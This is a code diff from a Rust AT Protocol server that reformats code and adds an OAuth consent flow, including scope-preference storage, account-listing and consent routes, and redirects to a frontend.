··· 79 79 } 80 80 81 81 if let Some(cb) = &self.circuit_breaker 82 - && !cb.can_execute().await { 83 - debug!("Skipping crawler notification due to circuit breaker open"); 84 - return; 85 - } 82 + && !cb.can_execute().await 83 + { 84 + debug!("Skipping crawler notification due to circuit breaker open"); 85 + return; 86 + } 86 87 87 88 self.mark_notified(); 88 89 let circuit_breaker = self.circuit_breaker.clone();
+1 -1
src/handle/mod.rs
··· 1 - use hickory_resolver::config::{ResolverConfig, ResolverOpts}; 2 1 use hickory_resolver::TokioAsyncResolver; 2 + use hickory_resolver::config::{ResolverConfig, ResolverOpts}; 3 3 use reqwest::Client; 4 4 use std::time::Duration; 5 5 use thiserror::Error;
+17 -1
src/lib.rs
··· 3 3 pub mod auth; 4 4 pub mod cache; 5 5 pub mod circuit_breaker; 6 + pub mod comms; 6 7 pub mod config; 7 8 pub mod crawlers; 8 9 pub mod handle; 9 10 pub mod image; 10 11 pub mod metrics; 11 - pub mod comms; 12 12 pub mod oauth; 13 13 pub mod plc; 14 14 pub mod rate_limit; ··· 344 344 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 345 345 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 346 346 .route( 347 + "/oauth/authorize/accounts", 348 + get(oauth::endpoints::authorize_accounts), 349 + ) 350 + .route( 347 351 "/oauth/authorize/select", 348 352 post(oauth::endpoints::authorize_select), 349 353 ) ··· 359 363 "/oauth/authorize/deny", 360 364 post(oauth::endpoints::authorize_deny), 361 365 ) 366 + .route( 367 + "/oauth/authorize/consent", 368 + get(oauth::endpoints::consent_get), 369 + ) 370 + .route( 371 + "/oauth/authorize/consent", 372 + post(oauth::endpoints::consent_post), 373 + ) 362 374 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 363 375 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 364 376 .route( ··· 368 380 .route( 369 381 "/xrpc/com.atproto.temp.checkSignupQueue", 370 382 get(api::temp::check_signup_queue), 383 + ) 384 + .route( 385 + "/xrpc/com.atproto.temp.dereferenceScope", 386 + post(api::temp::dereference_scope), 371 387 ) 372 388 .route( 373 389 "/xrpc/com.tranquil.account.getNotificationPrefs",
+3 -3
src/main.rs
··· 1 - use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender}; 2 - use tranquil_pds::crawlers::{Crawlers, start_crawlers_service}; 3 - use tranquil_pds::state::AppState; 4 1 use std::net::SocketAddr; 5 2 use std::process::ExitCode; 6 3 use std::sync::Arc; 7 4 use tokio::sync::watch; 8 5 use tracing::{error, info, warn}; 6 + use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender}; 7 + use tranquil_pds::crawlers::{Crawlers, start_crawlers_service}; 8 + use tranquil_pds::state::AppState; 9 9 10 10 #[tokio::main] 11 11 async fn main() -> ExitCode {
+20 -10
src/metrics.rs
··· 24 24 } 25 25 26 26 fn describe_metrics() { 27 - metrics::describe_counter!("tranquil_pds_http_requests_total", "Total number of HTTP requests"); 27 + metrics::describe_counter!( 28 + "tranquil_pds_http_requests_total", 29 + "Total number of HTTP requests" 30 + ); 28 31 metrics::describe_histogram!( 29 32 "tranquil_pds_http_request_duration_seconds", 30 33 "HTTP request duration in seconds" ··· 61 64 "tranquil_pds_rate_limit_rejections_total", 62 65 "Total number of rate limit rejections" 63 66 ); 64 - metrics::describe_counter!("tranquil_pds_db_queries_total", "Total number of database queries"); 67 + metrics::describe_counter!( 68 + "tranquil_pds_db_queries_total", 69 + "Total number of database queries" 70 + ); 65 71 metrics::describe_histogram!( 66 72 "tranquil_pds_db_query_duration_seconds", 67 73 "Database query duration in seconds" ··· 116 122 117 123 fn normalize_path(path: &str) -> String { 118 124 if path.starts_with("/xrpc/") 119 - && let Some(method) = path.strip_prefix("/xrpc/") { 120 - if let Some(q) = method.find('?') { 121 - return format!("/xrpc/{}", &method[..q]); 122 - } 123 - return path.to_string(); 125 + && let Some(method) = path.strip_prefix("/xrpc/") 126 + { 127 + if let Some(q) = method.find('?') { 128 + return format!("/xrpc/{}", &method[..q]); 124 129 } 130 + return path.to_string(); 131 + } 125 132 126 133 if path.starts_with("/u/") && path.ends_with("/did.json") { 127 134 return "/u/{handle}/did.json".to_string(); ··· 135 142 } 136 143 137 144 pub fn record_auth_cache_hit(cache_type: &str) { 138 - counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1); 145 + counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string()) 146 + .increment(1); 139 147 } 140 148 141 149 pub fn record_auth_cache_miss(cache_type: &str) { 142 - counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1); 150 + counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string()) 151 + .increment(1); 143 152 } 144 153 145 154 pub fn set_firehose_subscribers(count: usize) { ··· 172 181 } 173 182 174 183 pub fn record_rate_limit_rejection(limiter: &str) { 175 - counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1); 184 + counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string()) 185 + .increment(1); 176 186 } 177 187 178 188 pub fn record_db_query(query_type: &str, duration_seconds: f64) {
+36 -32
src/oauth/client.rs
··· 135 135 { 136 136 let cache = self.cache.read().await; 137 137 if let Some(cached) = cache.get(client_id) 138 - && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 139 - return Ok(cached.metadata.clone()); 140 - } 138 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs 139 + { 140 + return Ok(cached.metadata.clone()); 141 + } 141 142 } 142 143 let metadata = self.fetch_metadata(client_id).await?; 143 144 { ··· 168 169 { 169 170 let cache = self.jwks_cache.read().await; 170 171 if let Some(cached) = cache.get(jwks_uri) 171 - && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 172 - return Ok(cached.jwks.clone()); 173 - } 172 + && cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs 173 + { 174 + return Ok(cached.jwks.clone()); 175 + } 174 176 } 175 177 let jwks = self.fetch_jwks(jwks_uri).await?; 176 178 { ··· 190 192 if !jwks_uri.starts_with("https://") 191 193 && (!jwks_uri.starts_with("http://") 192 194 || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))) 193 - { 194 - return Err(OAuthError::InvalidClient( 195 - "jwks_uri must use https (except for localhost)".to_string(), 196 - )); 197 - } 195 + { 196 + return Err(OAuthError::InvalidClient( 197 + "jwks_uri must use https (except for localhost)".to_string(), 198 + )); 199 + } 198 200 let response = self 199 201 .http_client 200 202 .get(jwks_uri) ··· 302 304 return Ok(()); 303 305 } 304 306 if Self::is_loopback_client(&metadata.client_id) 305 - && let Ok(req_url) = reqwest::Url::parse(redirect_uri) { 306 - let req_host = req_url.host_str().unwrap_or(""); 307 - let is_loopback_redirect = req_url.scheme() == "http" 308 - && (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]"); 309 - if is_loopback_redirect { 310 - for registered in &metadata.redirect_uris { 311 - if let Ok(reg_url) = reqwest::Url::parse(registered) { 312 - let reg_host = reg_url.host_str().unwrap_or(""); 313 - let hosts_match = (req_host == "localhost" && reg_host == "localhost") 314 - || (req_host == "127.0.0.1" && reg_host == "127.0.0.1") 315 - || (req_host == "[::1]" && reg_host == "[::1]") 316 - || (req_host == "localhost" && reg_host == "127.0.0.1") 317 - || (req_host == "127.0.0.1" && reg_host == "localhost"); 318 - if hosts_match && req_url.path() == reg_url.path() { 319 - return Ok(()); 320 - } 307 + && let Ok(req_url) = reqwest::Url::parse(redirect_uri) 308 + { 309 + let req_host = req_url.host_str().unwrap_or(""); 310 + let is_loopback_redirect = req_url.scheme() == "http" 311 + && (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]"); 312 + if is_loopback_redirect { 313 + for registered in &metadata.redirect_uris { 314 + if let Ok(reg_url) = reqwest::Url::parse(registered) { 315 + let reg_host = reg_url.host_str().unwrap_or(""); 316 + let hosts_match = (req_host == "localhost" && reg_host == "localhost") 317 + || (req_host == "127.0.0.1" && reg_host == "127.0.0.1") 318 + || (req_host == "[::1]" && reg_host == "[::1]") 319 + || (req_host == "localhost" && reg_host == "127.0.0.1") 320 + || (req_host == "127.0.0.1" && reg_host == "localhost"); 321 + if hosts_match && req_url.path() == reg_url.path() { 322 + return Ok(()); 321 323 } 322 324 } 323 325 } 324 326 } 327 + } 325 328 Err(OAuthError::InvalidRequest( 326 329 "redirect_uri not registered for client".to_string(), 327 330 )) ··· 501 504 )); 502 505 } 503 506 if let Some(iat) = iat 504 - && iat > now + 60 { 505 - return Err(OAuthError::InvalidClient( 506 - "client_assertion iat is in the future".to_string(), 507 - )); 508 - } 507 + && iat > now + 60 508 + { 509 + return Err(OAuthError::InvalidClient( 510 + "client_assertion iat is in the future".to_string(), 511 + )); 512 + } 509 513 let jwks = cache.get_jwks(metadata).await?; 510 514 let keys = jwks 511 515 .get("keys")
+8 -2
src/oauth/db/mod.rs
··· 3 3 mod dpop; 4 4 mod helpers; 5 5 mod request; 6 + mod scope_preference; 6 7 mod token; 7 8 mod two_factor; 8 9 ··· 15 16 pub use request::{ 16 17 consume_authorization_request_by_code, create_authorization_request, 17 18 delete_authorization_request, delete_expired_authorization_requests, get_authorization_request, 18 - update_authorization_request, 19 + mark_request_authenticated, set_authorization_did, update_authorization_request, 20 + update_request_scope, 21 + }; 22 + pub use scope_preference::{ 23 + ScopePreference, delete_scope_preferences, get_scope_preferences, should_show_consent, 24 + upsert_scope_preferences, 19 25 }; 20 26 pub use token::{ 21 27 check_refresh_token_used, count_tokens_for_user, create_token, delete_oldest_tokens_for_user, 22 28 delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id, 23 - get_token_by_refresh_token, list_tokens_for_user, rotate_token, 29 + get_token_by_refresh_token, list_tokens_for_user, revoke_tokens_for_client, rotate_token, 24 30 }; 25 31 pub use two_factor::{ 26 32 TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
+61
src/oauth/db/request.rs
··· 67 67 } 68 68 } 69 69 70 + pub async fn set_authorization_did( 71 + pool: &PgPool, 72 + request_id: &str, 73 + did: &str, 74 + device_id: Option<&str>, 75 + ) -> Result<(), OAuthError> { 76 + sqlx::query!( 77 + r#" 78 + UPDATE oauth_authorization_request 79 + SET did = $2, device_id = $3 80 + WHERE id = $1 81 + "#, 82 + request_id, 83 + did, 84 + device_id 85 + ) 86 + .execute(pool) 87 + .await?; 88 + Ok(()) 89 + } 90 + 70 91 pub async fn update_authorization_request( 71 92 pool: &PgPool, 72 93 request_id: &str, ··· 151 172 .await?; 152 173 Ok(result.rows_affected()) 153 174 } 175 + 176 + pub async fn mark_request_authenticated( 177 + pool: &PgPool, 178 + request_id: &str, 179 + did: &str, 180 + device_id: Option<&str>, 181 + ) -> Result<(), OAuthError> { 182 + sqlx::query!( 183 + r#" 184 + UPDATE oauth_authorization_request 185 + SET did = $2, device_id = $3 186 + WHERE id = $1 187 + "#, 188 + request_id, 189 + did, 190 + device_id 191 + ) 192 + .execute(pool) 193 + .await?; 194 + Ok(()) 195 + } 196 + 197 + pub async fn update_request_scope( 198 + pool: &PgPool, 199 + request_id: &str, 200 + scope: &str, 201 + ) -> Result<(), OAuthError> { 202 + sqlx::query!( 203 + r#" 204 + UPDATE oauth_authorization_request 205 + SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text)) 206 + WHERE id = $1 207 + "#, 208 + request_id, 209 + scope 210 + ) 211 + .execute(pool) 212 + .await?; 213 + Ok(()) 214 + }
+103
src/oauth/db/scope_preference.rs
··· 1 + use super::super::OAuthError; 2 + use serde::{Deserialize, Serialize}; 3 + use sqlx::PgPool; 4 + 5 + #[derive(Debug, Clone, Serialize, Deserialize)] 6 + pub struct ScopePreference { 7 + pub scope: String, 8 + pub granted: bool, 9 + } 10 + 11 + pub async fn get_scope_preferences( 12 + pool: &PgPool, 13 + did: &str, 14 + client_id: &str, 15 + ) -> Result<Vec<ScopePreference>, OAuthError> { 16 + let rows = sqlx::query!( 17 + r#" 18 + SELECT scope, granted FROM oauth_scope_preference 19 + WHERE did = $1 AND client_id = $2 20 + "#, 21 + did, 22 + client_id 23 + ) 24 + .fetch_all(pool) 25 + .await?; 26 + 27 + Ok(rows 28 + .into_iter() 29 + .map(|r| ScopePreference { 30 + scope: r.scope, 31 + granted: r.granted, 32 + }) 33 + .collect()) 34 + } 35 + 36 + pub async fn upsert_scope_preferences( 37 + pool: &PgPool, 38 + did: &str, 39 + client_id: &str, 40 + prefs: &[ScopePreference], 41 + ) -> Result<(), OAuthError> { 42 + for pref in prefs { 43 + sqlx::query!( 44 + r#" 45 + INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at) 46 + VALUES ($1, $2, $3, $4, NOW(), NOW()) 47 + ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW() 48 + "#, 49 + did, 50 + client_id, 51 + pref.scope, 52 + pref.granted 53 + ) 54 + .execute(pool) 55 + .await?; 56 + } 57 + Ok(()) 58 + } 59 + 60 + pub async fn should_show_consent( 61 + pool: &PgPool, 62 + did: &str, 63 + client_id: &str, 64 + requested_scopes: &[String], 65 + ) -> Result<bool, OAuthError> { 66 + if requested_scopes.is_empty() { 67 + return Ok(false); 68 + } 69 + 70 + let stored_prefs = get_scope_preferences(pool, did, client_id).await?; 71 + if stored_prefs.is_empty() { 72 + return Ok(true); 73 + } 74 + 75 + let stored_scopes: std::collections::HashSet<&str> = 76 + stored_prefs.iter().map(|p| p.scope.as_str()).collect(); 77 + 78 + for scope in requested_scopes { 79 + if !stored_scopes.contains(scope.as_str()) { 80 + return Ok(true); 81 + } 82 + } 83 + 84 + Ok(false) 85 + } 86 + 87 + pub async fn delete_scope_preferences( 88 + pool: &PgPool, 89 + did: &str, 90 + client_id: &str, 91 + ) -> Result<(), OAuthError> { 92 + sqlx::query!( 93 + r#" 94 + DELETE FROM oauth_scope_preference 95 + WHERE did = $1 AND client_id = $2 96 + "#, 97 + did, 98 + client_id 99 + ) 100 + .execute(pool) 101 + .await?; 102 + Ok(()) 103 + }
+15
src/oauth/db/token.rs
··· 268 268 } 269 269 Ok(()) 270 270 } 271 + 272 + pub async fn revoke_tokens_for_client( 273 + pool: &PgPool, 274 + did: &str, 275 + client_id: &str, 276 + ) -> Result<u64, OAuthError> { 277 + let result = sqlx::query!( 278 + "DELETE FROM oauth_token WHERE did = $1 AND client_id = $2", 279 + did, 280 + client_id 281 + ) 282 + .execute(pool) 283 + .await?; 284 + Ok(result.rows_affected()) 285 + }
+757 -273
src/oauth/endpoints/authorize.rs
··· 1 1 use crate::comms::{CommsChannel, channel_display_name, enqueue_2fa_code}; 2 2 use crate::oauth::{ 3 - Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, client::ClientMetadataCache, db, templates, 3 + Code, DeviceData, DeviceId, OAuthError, SessionId, client::ClientMetadataCache, db, 4 4 }; 5 5 use crate::state::{AppState, RateLimitKind}; 6 6 use axum::{ 7 - Form, Json, 7 + Json, 8 8 extract::{Query, State}, 9 9 http::{ 10 10 HeaderMap, StatusCode, 11 11 header::{LOCATION, SET_COOKIE}, 12 12 }, 13 - response::{Html, IntoResponse, Redirect, Response}, 13 + response::{IntoResponse, Response}, 14 14 }; 15 15 use chrono::Utc; 16 16 use serde::{Deserialize, Serialize}; ··· 23 23 (StatusCode::SEE_OTHER, [(LOCATION, uri.to_string())]).into_response() 24 24 } 25 25 26 + fn redirect_to_frontend_error(error: &str, description: &str) -> Response { 27 + redirect_see_other(&format!( 28 + "/#/oauth/error?error={}&error_description={}", 29 + url_encode(error), 30 + url_encode(description) 31 + )) 32 + } 33 + 26 34 fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 27 35 headers 28 36 .get("cookie") ··· 41 49 fn extract_client_ip(headers: &HeaderMap) -> String { 42 50 if let Some(forwarded) = headers.get("x-forwarded-for") 43 51 && let Ok(value) = forwarded.to_str() 44 - && let Some(first_ip) = value.split(',').next() { 45 - return first_ip.trim().to_string(); 46 - } 52 + && let Some(first_ip) = value.split(',').next() 53 + { 54 + return first_ip.trim().to_string(); 55 + } 47 56 if let Some(real_ip) = headers.get("x-real-ip") 48 - && let Ok(value) = real_ip.to_str() { 49 - return value.trim().to_string(); 50 - } 57 + && let Ok(value) = real_ip.to_str() 58 + { 59 + return value.trim().to_string(); 60 + } 51 61 "0.0.0.0".to_string() 52 62 } 53 63 ··· 115 125 None => { 116 126 if wants_json(&headers) { 117 127 return ( 118 - axum::http::StatusCode::BAD_REQUEST, 128 + StatusCode::BAD_REQUEST, 119 129 Json(serde_json::json!({ 120 130 "error": "invalid_request", 121 131 "error_description": "Missing request_uri parameter. Use PAR to initiate authorization." 122 132 })), 123 133 ).into_response(); 124 134 } 125 - return ( 126 - axum::http::StatusCode::BAD_REQUEST, 127 - Html(templates::error_page( 128 - "invalid_request", 129 - Some("Missing request_uri parameter. Use PAR to initiate authorization."), 130 - )), 131 - ) 132 - .into_response(); 135 + return redirect_to_frontend_error( 136 + "invalid_request", 137 + "Missing request_uri parameter. Use PAR to initiate authorization.", 138 + ); 133 139 } 134 140 }; 135 141 let request_data = match db::get_authorization_request(&state.db, &request_uri).await { ··· 137 143 Ok(None) => { 138 144 if wants_json(&headers) { 139 145 return ( 140 - axum::http::StatusCode::BAD_REQUEST, 146 + StatusCode::BAD_REQUEST, 141 147 Json(serde_json::json!({ 142 148 "error": "invalid_request", 143 149 "error_description": "Invalid or expired request_uri. Please start a new authorization request." 144 150 })), 145 151 ).into_response(); 146 152 } 147 - return ( 148 - axum::http::StatusCode::BAD_REQUEST, 149 - Html(templates::error_page( 150 - "invalid_request", 151 - Some( 152 - "Invalid or expired request_uri. Please start a new authorization request.", 153 - ), 154 - )), 155 - ) 156 - .into_response(); 153 + return redirect_to_frontend_error( 154 + "invalid_request", 155 + "Invalid or expired request_uri. Please start a new authorization request.", 156 + ); 157 157 } 158 158 Err(e) => { 159 159 if wants_json(&headers) { 160 160 return ( 161 - axum::http::StatusCode::INTERNAL_SERVER_ERROR, 161 + StatusCode::INTERNAL_SERVER_ERROR, 162 162 Json(serde_json::json!({ 163 163 "error": "server_error", 164 164 "error_description": format!("Database error: {:?}", e) ··· 166 166 ) 167 167 .into_response(); 168 168 } 169 - return ( 170 - axum::http::StatusCode::INTERNAL_SERVER_ERROR, 171 - Html(templates::error_page( 172 - "server_error", 173 - Some(&format!("Database error: {:?}", e)), 174 - )), 175 - ) 176 - .into_response(); 169 + return redirect_to_frontend_error("server_error", "A database error occurred."); 177 170 } 178 171 }; 179 172 if request_data.expires_at < Utc::now() { 180 173 let _ = db::delete_authorization_request(&state.db, &request_uri).await; 181 174 if wants_json(&headers) { 182 175 return ( 183 - axum::http::StatusCode::BAD_REQUEST, 176 + StatusCode::BAD_REQUEST, 184 177 Json(serde_json::json!({ 185 178 "error": "invalid_request", 186 179 "error_description": "Authorization request has expired. Please start a new request." 187 180 })), 188 181 ).into_response(); 189 182 } 190 - return ( 191 - axum::http::StatusCode::BAD_REQUEST, 192 - Html(templates::error_page( 193 - "invalid_request", 194 - Some("Authorization request has expired. Please start a new request."), 195 - )), 196 - ) 197 - .into_response(); 183 + return redirect_to_frontend_error( 184 + "invalid_request", 185 + "Authorization request has expired. Please start a new request.", 186 + ); 198 187 } 199 188 let client_cache = ClientMetadataCache::new(3600); 200 189 let client_name = client_cache ··· 216 205 let force_new_account = query.new_account.unwrap_or(false); 217 206 if !force_new_account 218 207 && let Some(device_id) = extract_device_cookie(&headers) 219 - && let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await 220 - && !accounts.is_empty() { 221 - let device_accounts: Vec<DeviceAccount> = accounts 222 - .into_iter() 223 - .map(|row| DeviceAccount { 224 - did: row.did, 225 - handle: row.handle, 226 - email: row.email, 227 - last_used_at: row.last_used_at, 228 - }) 229 - .collect(); 230 - return Html(templates::account_selector_page( 231 - &request_data.parameters.client_id, 232 - client_name.as_deref(), 233 - &request_uri, 234 - &device_accounts, 235 - )) 236 - .into_response(); 237 - } 238 - Html(templates::login_page( 239 - &request_data.parameters.client_id, 240 - client_name.as_deref(), 241 - request_data.parameters.scope.as_deref(), 242 - &request_uri, 243 - None, 244 - request_data.parameters.login_hint.as_deref(), 208 + && let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await 209 + && !accounts.is_empty() 210 + { 211 + return redirect_see_other(&format!( 212 + "/#/oauth/accounts?request_uri={}", 213 + url_encode(&request_uri) 214 + )); 215 + } 216 + redirect_see_other(&format!( 217 + "/#/oauth/login?request_uri={}", 218 + url_encode(&request_uri) 245 219 )) 246 - .into_response() 247 220 } 248 221 249 222 pub async fn authorize_get_json( ··· 272 245 })) 273 246 } 274 247 248 + #[derive(Debug, Serialize)] 249 + pub struct AccountInfo { 250 + pub did: String, 251 + pub handle: String, 252 + #[serde(skip_serializing_if = "Option::is_none")] 253 + pub email: Option<String>, 254 + } 255 + 256 + #[derive(Debug, Serialize)] 257 + pub struct AccountsResponse { 258 + pub accounts: Vec<AccountInfo>, 259 + pub request_uri: String, 260 + } 261 + 262 + fn mask_email(email: &str) -> String { 263 + if let Some(at_pos) = email.find('@') { 264 + let local = &email[..at_pos]; 265 + let domain = &email[at_pos..]; 266 + if local.len() <= 2 { 267 + format!("{}***{}", local.chars().next().unwrap_or('*'), domain) 268 + } else { 269 + let first = local.chars().next().unwrap_or('*'); 270 + let last = local.chars().last().unwrap_or('*'); 271 + format!("{}***{}{}", first, last, domain) 272 + } 273 + } else { 274 + "***".to_string() 275 + } 276 + } 277 + 278 + pub async fn authorize_accounts( 279 + State(state): State<AppState>, 280 + headers: HeaderMap, 281 + Query(query): Query<AuthorizeQuery>, 282 + ) -> Response { 283 + let request_uri = match query.request_uri { 284 + Some(uri) => uri, 285 + None => { 286 + return ( 287 + StatusCode::BAD_REQUEST, 288 + Json(serde_json::json!({ 289 + "error": "invalid_request", 290 + "error_description": "Missing request_uri parameter" 291 + })), 292 + ) 293 + .into_response(); 294 + } 295 + }; 296 + let device_id = match extract_device_cookie(&headers) { 297 + Some(id) => id, 298 + None => { 299 + return Json(AccountsResponse { 300 + accounts: vec![], 301 + request_uri, 302 + }) 303 + .into_response(); 304 + } 305 + }; 306 + let accounts = match db::get_device_accounts(&state.db, &device_id).await { 307 + Ok(accts) => accts, 308 + Err(_) => { 309 + return Json(AccountsResponse { 310 + accounts: vec![], 311 + request_uri, 312 + }) 313 + .into_response(); 314 + } 315 + }; 316 + let account_infos: Vec<AccountInfo> = accounts 317 + .into_iter() 318 + .map(|row| AccountInfo { 319 + did: row.did, 320 + handle: row.handle, 321 + email: row.email.map(|e| mask_email(&e)), 322 + }) 323 + .collect(); 324 + Json(AccountsResponse { 325 + accounts: account_infos, 326 + request_uri, 327 + }) 328 + .into_response() 329 + } 330 + 275 331 pub async fn authorize_post( 276 332 State(state): State<AppState>, 277 333 headers: HeaderMap, 278 - Form(form): Form<AuthorizeSubmit>, 334 + Json(form): Json<AuthorizeSubmit>, 279 335 ) -> Response { 280 336 let json_response = wants_json(&headers); 281 337 let client_ip = extract_client_ip(&headers); ··· 294 350 ) 295 351 .into_response(); 296 352 } 297 - return ( 298 - axum::http::StatusCode::TOO_MANY_REQUESTS, 299 - Html(templates::error_page( 300 - "RateLimitExceeded", 301 - Some("Too many login attempts. Please try again later."), 302 - )), 303 - ) 304 - .into_response(); 353 + return redirect_to_frontend_error( 354 + "RateLimitExceeded", 355 + "Too many login attempts. Please try again later.", 356 + ); 305 357 } 306 358 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 307 359 Ok(Some(data)) => data, ··· 316 368 ) 317 369 .into_response(); 318 370 } 319 - return Html(templates::error_page( 371 + return redirect_to_frontend_error( 320 372 "invalid_request", 321 - Some("Invalid or expired request_uri. Please start a new authorization request."), 322 - )) 323 - .into_response(); 373 + "Invalid or expired request_uri. Please start a new authorization request.", 374 + ); 324 375 } 325 376 Err(e) => { 326 377 if json_response { ··· 333 384 ) 334 385 .into_response(); 335 386 } 336 - return Html(templates::error_page( 337 - "server_error", 338 - Some(&format!("Database error: {:?}", e)), 339 - )) 340 - .into_response(); 387 + return redirect_to_frontend_error("server_error", &format!("Database error: {:?}", e)); 341 388 } 342 389 }; 343 390 if request_data.expires_at < Utc::now() { ··· 352 399 ) 353 400 .into_response(); 354 401 } 355 - return Html(templates::error_page( 402 + return redirect_to_frontend_error( 356 403 "invalid_request", 357 - Some("Authorization request has expired. Please start a new request."), 358 - )) 359 - .into_response(); 404 + "Authorization request has expired. Please start a new request.", 405 + ); 360 406 } 361 - let client_cache = ClientMetadataCache::new(3600); 362 - let client_name = client_cache 363 - .get(&request_data.parameters.client_id) 364 - .await 365 - .ok() 366 - .and_then(|m| m.client_name); 367 407 let show_login_error = |error_msg: &str, json: bool| -> Response { 368 408 if json { 369 409 return ( ··· 375 415 ) 376 416 .into_response(); 377 417 } 378 - Html(templates::login_page( 379 - &request_data.parameters.client_id, 380 - client_name.as_deref(), 381 - request_data.parameters.scope.as_deref(), 382 - &form.request_uri, 383 - Some(error_msg), 384 - Some(&form.username), 418 + redirect_see_other(&format!( 419 + "/#/oauth/login?request_uri={}&error={}", 420 + url_encode(&form.request_uri), 421 + url_encode(error_msg) 385 422 )) 386 - .into_response() 387 423 }; 388 424 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 389 425 let normalized_username = form.username.trim(); ··· 419 455 { 420 456 Ok(Some(u)) => u, 421 457 Ok(None) => { 422 - let _ = bcrypt::verify(&form.password, "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK"); 458 + let _ = bcrypt::verify( 459 + &form.password, 460 + "$2b$12$LQv3c1yqBWVHxkd0LHAkCOYz6TtxMQJqhN8/X4.VTtYw1ZzQKZqmK", 461 + ); 423 462 return show_login_error("Invalid handle/email or password.", json_response); 424 463 } 425 464 Err(_) => return show_login_error("An error occurred. Please try again.", json_response), ··· 435 474 || user.telegram_verified 436 475 || user.signal_verified; 437 476 if !is_verified { 438 - return show_login_error("Please verify your account before logging in.", json_response); 477 + return show_login_error( 478 + "Please verify your account before logging in.", 479 + json_response, 480 + ); 439 481 } 440 482 let password_valid = match bcrypt::verify(&form.password, &user.password_hash) { 441 483 Ok(valid) => valid, ··· 460 502 ); 461 503 } 462 504 let channel_name = channel_display_name(user.preferred_comms_channel); 463 - let redirect_url = format!( 464 - "/oauth/authorize/2fa?request_uri={}&channel={}", 505 + if json_response { 506 + return Json(serde_json::json!({ 507 + "needs_2fa": true, 508 + "channel": channel_name 509 + })) 510 + .into_response(); 511 + } 512 + return redirect_see_other(&format!( 513 + "/#/oauth/2fa?request_uri={}&channel={}", 465 514 url_encode(&form.request_uri), 466 515 url_encode(channel_name) 467 - ); 468 - return Redirect::temporary(&redirect_url).into_response(); 516 + )); 469 517 } 470 518 Err(_) => { 471 519 return show_login_error("An error occurred. Please try again.", json_response); 472 520 } 473 521 } 474 522 } 475 - let code = Code::generate(); 476 523 let mut device_id: Option<String> = extract_device_cookie(&headers); 477 524 let mut new_cookie: Option<String> = None; 478 525 if form.remember_device { ··· 497 544 }; 498 545 let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await; 499 546 } 547 + if db::set_authorization_did( 548 + &state.db, 549 + &form.request_uri, 550 + &user.did, 551 + device_id.as_deref(), 552 + ) 553 + .await 554 + .is_err() 555 + { 556 + return show_login_error("An error occurred. Please try again.", json_response); 557 + } 558 + let requested_scope_str = request_data 559 + .parameters 560 + .scope 561 + .as_deref() 562 + .unwrap_or("atproto"); 563 + let requested_scopes: Vec<String> = requested_scope_str 564 + .split_whitespace() 565 + .map(|s| s.to_string()) 566 + .collect(); 567 + let needs_consent = db::should_show_consent( 568 + &state.db, 569 + &user.did, 570 + &request_data.parameters.client_id, 571 + &requested_scopes, 572 + ) 573 + .await 574 + .unwrap_or(true); 575 + if needs_consent { 576 + let consent_url = format!( 577 + "/#/oauth/consent?request_uri={}", 578 + url_encode(&form.request_uri) 579 + ); 580 + if json_response { 581 + if let Some(cookie) = new_cookie { 582 + return ( 583 + StatusCode::OK, 584 + [(SET_COOKIE, cookie)], 585 + Json(serde_json::json!({"redirect_uri": consent_url})), 586 + ) 587 + .into_response(); 588 + } 589 + return Json(serde_json::json!({"redirect_uri": consent_url})).into_response(); 590 + } 591 + if let Some(cookie) = new_cookie { 592 + return ( 593 + StatusCode::SEE_OTHER, 594 + [(SET_COOKIE, cookie), (LOCATION, consent_url)], 595 + ) 596 + .into_response(); 597 + } 598 + return redirect_see_other(&consent_url); 599 + } 600 + let code = Code::generate(); 500 601 if db::update_authorization_request( 501 602 &state.db, 502 603 &form.request_uri, ··· 513 614 &request_data.parameters.redirect_uri, 514 615 &code.0, 515 616 request_data.parameters.state.as_deref(), 617 + request_data.parameters.response_mode.as_deref(), 516 618 ); 517 - if let Some(cookie) = new_cookie { 619 + if json_response { 620 + if let Some(cookie) = new_cookie { 621 + ( 622 + StatusCode::OK, 623 + [(SET_COOKIE, cookie)], 624 + Json(serde_json::json!({"redirect_uri": redirect_url})), 625 + ) 626 + .into_response() 627 + } else { 628 + Json(serde_json::json!({"redirect_uri": redirect_url})).into_response() 629 + } 630 + } else if let Some(cookie) = new_cookie { 518 631 ( 519 632 StatusCode::SEE_OTHER, 520 633 [(SET_COOKIE, cookie), (LOCATION, redirect_url)], ··· 528 641 pub async fn authorize_select( 529 642 State(state): State<AppState>, 530 643 headers: HeaderMap, 531 - Form(form): 